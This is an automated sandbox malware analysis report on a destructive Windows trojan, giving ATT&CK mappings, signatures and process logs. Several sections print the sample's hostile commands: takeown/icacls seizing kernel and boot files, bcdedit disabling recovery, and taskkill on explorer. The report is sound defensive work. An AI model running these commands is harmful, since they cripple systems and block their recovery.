Malware Analysis Report

2024-09-11 03:45

Sample ID 240619-pd81cavbqj
Target Personalization-trojan-3.1.zip
SHA256 88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc
Tags
defense_evasion discovery evasion exploit ransomware persistence privilege_escalation trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc

Threat Level: Known bad

The file Personalization-trojan-3.1.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion exploit ransomware persistence privilege_escalation trojan

UAC bypass

Modifies boot configuration data using bcdedit

Possible privilege escalation attempt

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Modifies file permissions

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Sets desktop wallpaper using registry

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

Modifies data under HKEY_USERS

Modifies registry class

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Runs net.exe

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Event Triggered Execution
T1546
Accessibility Features
T1546.008
Privilege Escalation
TA0004
Event Triggered Execution
T1546
Accessibility Features
T1546.008
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Defense Evasion
TA0005
File and Directory Permissions Modification
T1222
Windows File and Directory Permissions Modification
T1222.001
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490
Defacement
T1491
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-19 12:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

133s

Max time network

136s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 200.79.70.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:17

Platform

win10-20240611-en

Max time kernel

129s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2376 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe C:\Windows\System32\cscript.exe
PID 2376 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe C:\Windows\System32\cscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe"

C:\Windows\System32\cscript.exe

"C:\Windows\sysnative\cscript" C:\Users\Admin\AppData\Local\Temp\D30F.tmp\D310.tmp\D321.vbs //Nologo

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\D30F.tmp\D310.tmp\D321.vbs

MD5 82455ed5816ace2c6842dc84cb620b37
SHA1 cade773fe4a7bc311a08829f3b38e08ae7c1415a
SHA256 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e
SHA512 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

135s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat"

Signatures

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\ARKADI~1.AWA\Assets\awards_circle_gray.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\TOURNA~1\GameModeFreeCell.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~1\OneNoteAppList.targetsize-20_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Designs\Flags\large\nc_60x42.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MID6EE~1.SCA\AppxManifest.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~1\OneNoteSectionGroupLargeTile.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI5B43~1.0_X\Assets\OneConnectAppList.targetsize-256.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\EMBOSS~1\plus.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE03D~1.0_X\Microsoft.Graphics.Canvas.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\ARKADI~1.STA\Assets\new_collection_available.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIFA2C~1.SCA\SkypeApp\Assets\edit_12x12.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\EMBOSS~1\Chevron_icon.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\Assets\PhotosAppList.contrast-white_targetsize-256.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\5511_20x20x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\AppTiles\CONTRA~2\MapsLargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE745~1.0_X\Assets\AppPackageAppList.targetsize-36_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\Western\western_13s.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\CONTRA~1\OneNoteSplashLogo.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB044~1.SCA\Assets\TimerLargeTile.contrast-white_scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\HxCalendarAppImm.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\OutlookMailSmallTile.scale-150.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI97D5~1.SCA\Assets\SECOND~1\DIRECT~1\Work\LTR\CONTRA~2\LargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\SECOND~1\DIRECT~1\Home\RTL\LargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI476B~1.0_X\VFS\PROGRA~1\MICROS~1\OFFICE16\MUOPTIN.DLL C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\SECOND~1\Place\MedTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIA74D~1.SCA\Assets\CONTRA~1\SmallLogo.scale-150_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\OcsClientImm.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI79E2~1.0_X\Assets\GetStartedAppList.targetsize-96_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\HOWTOP~1\Klondike\Tips_6.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI115C~1.SCA\Assets\WorldClockWideTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~2\HxMailWideTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI22BC~1.0_X\Assets\VoiceRecorderAppList.contrast-white_targetsize-24_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\MANIFE~1\CONTRA~2\Icon.targetsize-32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE984~1.0_X\Assets\SECOND~1\TRAFFI~1\CONTRA~2\SmallTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7B67~1.0_X\Assets\GamesXboxHubAppList.targetsize-32_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\THEMEP~1\Effects\Dust.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\HOWTOP~1\Klondike\Goal_2.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\background_gradient_2.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\SHARPD~1\RENDER~1\Shaders\Builtin\Bin\Textured_PS.fxo C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI698D~1.0_X\Assets\CONTRA~2\PeopleSplashScreen.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7B67~1.0_X\resources.pri C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\AppList.targetsize-20_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE03D~1.0_X\TEE\en-US.Calendar.model C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~4.0_X\Assets\AppTiles\CONTRA~1\Weather_TileSmallSquare.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI169C~1.SCA\Assets\CalculatorLargeTile.contrast-white_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI97D5~1.SCA\Assets\SECOND~1\DIRECT~1\Home\RTL\LargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\Catalog\shape_hexagon.3mf C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI698D~1.0_X\PeopleShared.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0911~1.0_X\AppxSignature.p7x C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI115C~1.SCA\Assets\AlarmsMedTile.contrast-black_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~1\HxMailSplashLogo.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\CONTRA~1\iheart-radio.scale-100_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC69C~1.0_X\SkypeApp\Assets\SkypeTile.scale-200_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\CONTRA~2\HxA-Yahoo-Light.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MID550~1.SCA\Assets\SECOND~1\DIRECT~1\Car\RTL\CONTRA~1\SmallTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\GAMEPL~1\LOCALI~1\localized_EN-GB.respack C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Themes\themes_frame.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\10909_36x36x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI9599~1.0_X\Assets\WINDOW~1\WindowsCameraLargeTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\GameEnd\endGame_blue_up.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\HxMailLargeTile.scale-150.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI214C~1.0_X\Assets\trace.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7B67~1.0_X\Assets\GamesXboxHubAppList.targetsize-40_altform-unplated_contrast-high.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\AppList.scale-100.png C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\system32\mspaint.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 512 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 4016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 4016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 4264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 512 wrote to memory of 4264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 512 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 512 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 512 wrote to memory of 1312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 512 wrote to memory of 1312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 512 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 512 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 512 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 512 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mspaint.exe
PID 512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 512 wrote to memory of 520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 512 wrote to memory of 520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ntoskrnl.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\hal.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\hal.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ci.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ci.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\winload.efi"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\winload.efi" /grant everyone:F

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\WindowsApps"

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\WindowsApps" /grant everyone:F

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\mspaint.exe

mspaint.exe

C:\Windows\system32\notepad.exe

notepad.exe

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService

C:\Windows\system32\timeout.exe

timeout /t 30 /nobreak

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

136s

Max time network

139s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

78s

Max time network

79s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"

Signatures

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\MICROS~3.SCA\Assets\AppTiles\Weather_TileLargeSquare.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\7260_24x24x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI155A~1.SCA\Assets\CONTRA~1\PeopleAppStoreLogo.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI115C~1.SCA\Assets\AlarmsAppList.contrast-white_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI7C12~1.0_X\Assets\music_welcome_page2.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.0_X\Assets\HelpIcon_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI21E8~1.0_X\Assets\Images\Stickers\THUMBN~1\Sticker_Icon_4_Point_Star.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE745~1.0_X\Assets\CONTRA~1\AppPackageAppList.targetsize-36_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\Audio\Daily_challenge_Coins Hit progress bar.wav C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\HOWTOP~1\StarClub\Help_3_2.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI21E8~1.0_X\Assets\Images\Stickers\THUMBN~1\Sticker_Icon_Gravel.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\2653_24x24x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\6478_48x48x32.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\FolderOrganizationCalloutImage.gif C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB685~1.0_X\images\HxMailLargeTile.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~3.0_X\MICROS~1.MET\Autogen\JSBYTE~1 C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIEA86~1.0_X\Assets\THEMEP~1\Themes\classic.jpg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI21E8~1.0_X\Assets\Images\Stickers\THUMBN~1\Sticker_Icon_SadMouth.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI20CB~1.0_X\images\OneNotePageWideTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIE745~1.0_X\Assets\AppPackageAppList.targetsize-30.png C:\Windows\system32\cmd.exe N/A
